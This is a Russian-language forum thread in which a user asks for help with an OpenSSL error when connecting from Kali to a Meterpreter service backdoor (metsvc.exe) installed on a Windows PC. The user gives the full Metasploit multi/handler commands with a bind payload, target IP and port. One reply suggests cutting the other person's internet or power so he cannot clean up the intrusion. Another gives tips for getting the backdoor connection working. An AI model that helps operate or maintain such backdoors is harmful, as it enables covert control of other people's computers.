если кто сталкивался с такой ошибкой: [-] OpenSSL::SSL::SSLError SSL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A подскажите как можно исправить 1) на пк был установлен metsvc.exe (в качестве службы) ставил из этого архива 2) через kali подключаюсь следующим образом: use exploit/multi/handler set PAYLOAD windows/metsvc_bind_tcp set LPORT 31337 set RHOST 192.168.8.116 exploit [*] Starting the payload handler... [*] Started bind handler [-] OpenSSL::SSL::SSLError SSL_accept SYSCALL returned=5 errno=0 state=SSLv2/v3 read client hello A ^C[-] Exploit failed: Interrupt
Я не очень силён, но, думаю, можно попробовать просто обрубить ему интернет после логина, таким образом не дать разлогиниться. Пожаловаться на провайдера и т.п. Или свет обрубить, чтобы вообще ничего не мог почистить. По крайней мере я вижу решение именно в таком ключе.
Сама ошибка кроется в том, что, первое, иногда не позволяет имя хоста (хост кирилицей или использует символы, которые не понимает OpenSSL). Второе, если вы используете самоподписанный сертификат, то нужно отключить его проверку, её он точно не пройдет --no-check. Третье, попробуйте сменить тип шифрования. (В метасплоите такие штуки обычно в дополнительных опциях (show advanced)). Обновление OpenSSL и Метасплоита тоже может помочь. А ещё не забудьте проверить время что оно правильное. Code: apt-get update openssl && msfupdate
Для развития можешь почитать тут,может что-то для себя почерпнешь. https://habrahabr.ru/company/neobit/blog/325490/